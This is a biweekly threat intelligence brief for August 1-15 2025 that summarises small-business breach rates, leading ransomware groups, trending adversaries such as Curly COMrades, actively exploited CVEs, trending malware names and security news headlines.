Byer-Nichols Threat Brief Cybersecurity Data For August 1-15 2025

Executive Summary

Small businesses continue to dominate the ranks of breach victims at 84.25%. When we consider that small businesses represent about half of employment globally and about 44% of US GDP they fall victim to more than their fair share of cyber-attacks. This is a symptom of the fact that many SMBs lag larger enterprises in their security posture and capabilities. Lacking the financial resources of large enterprises, a cyber breach is also more likely to put an SMB out of business. Smaller businesses must focus on addressing cyber risk – their survival depends on it.

Report Links

Download Threat Brief For August 1-15 2025

Listen to Podcast Deep Dive

Top Ransomware

Amongst ransomware actors, Qilin has solidified its position in first place, growing from 13% to just over 20% of attacks. Akira has also strengthened its position, moving to number 2 with just over 14% of attacks (up from just under 10%). The remaining positions in the top 5 ransomware actors are taken by new players: PLAY, Sinobi and BlackNevas. BlackNevas, a crypto-ransomware actor also known as Trial_Recovery, while first seen in September 2024, is notable for its recent reappearance after a hiatus of several months.

Victim Sector

Victim Location

Trending Adversaries

• Curly COMrades
• Linen Typhoon
• ShinyHunters
• Storm-2603
• Violet Typhoon

Amongst trending adversaries, it is worth noting Curly COMrades, which is an APT group with apparent links to the Russian Federation. The name “Curly COMrades” is derived from their use of curl.exe for Command and Control (C2) communications and data exfiltration. Their main targets appear to be in Eastern Europe, particularly organizations in EU-aspirant nations Moldova and Georgia. Once they infiltrate a network they set up multiple reverse proxy tunnels to relays under their control. These tunnels are ultimately used to exfiltrate data, apparently for espionage purposes. Indicators of Compromise and TTPs are listed in Bitdefender’s report and can be used to create detection rules. While targets are currently primarily in Georgia and Moldova, Russian groups are notorious for targeting any country that supports Ukraine.

Trending & Actively Exploited Vulnerabilities

Vulnerabilities that warrant attention include 3 affecting D-Link equipment and dating back to 2020 and 2022 (CVE-2020-25078, CVE-2020-25079, CVE-2022-40799). Of particular concern is a recently announced high-severity vulnerability in on-premises Microsoft Exchange Server 2019 deployments (CVE-2025-53786). Microsoft strongly recommends that affected organizations promptly apply hotfixes which were provided in April 2025. Organizations with vulnerable systems exposed to the Internet should consider isolating them until they are patched.

Trending Malware

• 4L4MD4R
• EDRKillShifter
• MucorAgent
• Plague
• SparkKitty
• XZ backdoor

Top News

• Critical Zero-Day Bugs Crack Open CyberArk, HashiCorp Password Vaults
• Hacker extradited to US for stealing $3.3 million in crypto
• Microsoft pays record $17 million in bounties
• New 'Shade BIOS' Technique Beats Every Kind of AV
• New Ghost Calls tactic abuses Zoom and Microsoft Teams
• ShinyHunters Tactics Now Mirror Scattered Spider
• SonicWall urges admins to disable SSLVPN amid critical bug
• Over $300 million in cybercrime crypto seized by DOJ

Contributors

Written by Jeremy Nichols, former Director Of The Global Threat Intelligence Center
Executive Summaries & Adversary Bio’s by Geoff Rehmet, Cybersecurity Expert
Produced & Distributed By Phish Tank Cybersecurity Marketing Division